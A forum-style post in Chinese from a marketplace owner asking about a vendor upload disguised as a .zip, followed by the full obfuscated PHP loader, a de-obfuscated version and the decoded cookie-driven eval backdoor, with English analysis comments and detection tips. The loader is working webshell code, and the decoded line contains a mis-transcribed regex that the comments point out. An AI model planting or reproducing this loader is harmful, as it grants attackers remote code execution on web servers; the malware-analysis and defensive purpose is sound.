我拥有一个数字商品交易市场,有一个供应商上传了这个文件,它是一个zip文件,但在Windows上显示为损坏的。当我在Linux中打开它时,我震惊地发现这个文件本身是一个php文件,有人添加了.zip扩展名。
有人见过这样的代码吗?谁能帮我理解它?它是否恶意?
<?php
// Obfuscated PHP loader (described on this page as uploaded with a .zip extension).
// It builds three function names and a base64 payload at runtime, so none of
// "str_replace", "base64_decode", "create_function" or the payload text appears
// verbatim in the file. That defeats naive keyword scanning.
// Payload fragment 4 of 4 (concatenation order is $gewk.$qxau.$seld.$pljd); "nv" is filler.
$pljd="ynvwnKynvcpLCBqb2luKGFynvcmF5X3NsaWNlKCRhLCRjKCRnvhKS0zKSkpKSk7ZWNobyAnPnvC8nLnviRrLic+Jzt9";
// Payload fragment 3 of 4.
$seld="ZXBnvsYnvWNlKGFycmF5KCcvnvWnv15cdz1nvcc10nvvJywnL1xznvLycnvpLCBhcnJheSgnJ";
// Removing every "w" leaves the string "str_replace"; $cyvj is then used as a variable function.
$cyvj = str_replace("w","","wswtwrw_wrwepwlwacwe");
// Payload fragment 2 of 4.
$qxau="GEpPjMpnveyRrPSdzZXJhdGknO2VjaG8gnvJzwnLiRnvrLic+JznvtldnvmFsKnvGnvJhc2U2NF9kZWNvZGnvUocHJlZ19nvy";
// Payload fragment 1 of 4.
$gewk="JGnvM9J2NvnvdW50JznvskYT0kX0NPT0tJRTnvtpZihyZnvXNldCgknvYSk9PSdtYSnvcgJiYgJGMoJ";
// Removing every "bi" leaves "base64_decode".
$thyw = $cyvj("bi", "", "bibabisbie64bi_dbiebicbiobidbie");
// Removing every "x" leaves "create_function".
$iign = $cyvj("x","","xcxrxexaxtxex_funxctixon");
// Equivalent to create_function('', base64_decode(<fragments with "nv" stripped>)), called at once.
// create_function() compiles a string into a function body, so this is an eval in disguise.
// It was deprecated in PHP 7.2 and removed in PHP 8.0, so the loader only runs on older runtimes.
// The decoded body (shown at the end of this page) reads $_COOKIE and eval()s data taken from it.
// Treat the file as a backdoor and do not execute it outside an isolated analysis environment.
$xzfy = $iign('', $thyw($cyvj("nv", "", $gewk.$qxau.$seld.$pljd))); $xzfy();
?>
这是我从中提取到的内容。
<?php
// First de-obfuscation pass: the three scrambled function-name strings have been replaced by
// their plain values. The str_replace() calls are now no-ops, because "str_replace",
// "base64_decode" and "create_function" contain no "w", "bi" or "x" respectively.
// The base64 payload fragments still carry the "nv" filler.
// Payload fragment 4 of 4 (concatenation order is $gewk.$qxau.$seld.$pljd).
$pljd="ynvwnKynvcpLCBqb2luKGFynvcmF5X3NsaWNlKCRhLCRjKCRnvhKS0zKSkpKSk7ZWNobyAnPnvC8nLnviRrLic+Jzt9";
// Payload fragment 3 of 4.
$seld="ZXBnvsYnvWNlKGFycmF5KCcvnvWnv15cdz1nvcc10nvvJywnL1xznvLycnvpLCBhcnJheSgnJ";
// $cyvj holds the callable name "str_replace".
$cyvj = str_replace("w","","str_replace");
// Payload fragment 2 of 4.
$qxau="GEpPjMpnveyRrPSdzZXJhdGknO2VjaG8gnvJzwnLiRnvrLic+JznvtldnvmFsKnvGnvJhc2U2NF9kZWNvZGnvUocHJlZ19nvy";
// Payload fragment 1 of 4.
$gewk="JGnvM9J2NvnvdW50JznvskYT0kX0NPT0tJRTnvtpZihyZnvXNldCgknvYSk9PSdtYSnvcgJiYgJGMoJ";
// $thyw holds the callable name "base64_decode".
$thyw = $cyvj("bi", "", "base64_decode");
// $iign holds the callable name "create_function".
$iign = $cyvj("x","","create_function");
// Strips "nv" from the joined fragments, base64-decodes the result, compiles it as the body of
// an argument-less function via create_function() (string-to-code, like eval), then calls it.
// This is still live code. Analyse it statically instead of running it.
$xzfy = $iign('', $thyw($cyvj("nv", "", $gewk.$qxau.$seld.$pljd))); $xzfy();
?>
// Second de-obfuscation pass, written as a sketch rather than runnable PHP: the empty first
// argument ('') of create_function() is omitted and the base64 literal is unquoted.
// NOTE(review): stripping "nv" from the original fragments yields "...dz1cc10vJywn...", but this
// transcription has "...dz1cc10nJywn...". The one-character slip turns a "/" into a "'" in the
// decoded text.
$xzfy = create_function(base64_decode(JGM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihyZXNldCgkYSk9PSdtYScgJiYgJGMoJGEpPjMpeyRrPSdzZXJhdGknO2VjaG8gJzwnLiRrLic+JztldmFsKGJhc2U2NF9kZWNvZGUocHJlZ19yZXBsYWNlKGFycmF5KCcvW15cdz1cc10nJywnL1xzLycpLCBhcnJheSgnJywnKycpLCBqb2luKGFycmF5X3NsaWNlKCRhLCRjKCRhKS0zKSkpKSk7ZWNobyAnPC8nLiRrLic+Jzt9))
// Decoded payload: a cookie-triggered code-execution backdoor, so the uploaded file is malicious.
// NOTE(review): the first regex is mis-transcribed here as '/[^\w=\s]''. Decoding the original
// fragments gives '/[^\w=\s]/' with a closing "/" delimiter.
// What it does:
//   - $a is the request's cookie array and $c is the callable name 'count'.
//   - The body runs only when the first cookie value loosely equals 'ma' and there are more
//     than three cookies.
//   - The last three cookie values are joined with no separator. Characters other than word
//     characters, "=" and whitespace are removed, and whitespace is replaced by "+".
//   - The result is base64-decoded and passed to eval(), so the requester's code runs with the
//     privileges of the PHP process.
//   - Anything the evaluated code prints is wrapped in <serati> ... </serati>.
// Defensive notes:
//   - Instructions arrive in the Cookie header, which common access-log formats do not record,
//     so URL and POST-body logs alone will not show use of this backdoor.
//   - A "<serati>" element in response bodies is a usable indicator.
//   - In files, hunt for create_function or eval fed by base64_decode, and for function names
//     assembled with str_replace.
//   - Validate uploads by content rather than extension, and keep vendor uploads out of any
//     path the web server will execute as PHP.
$c='count';$a=$_COOKIE;if(reset($a)=='ma' && $c($a)>3){$k='serati';echo '<'.$k.'>';eval(base64_decode(preg_replace(array('/[^\w=\s]'','/\s/'), array('','+'), join(array_slice($a,$c($a)-3)))));echo '</'.$k.'>';}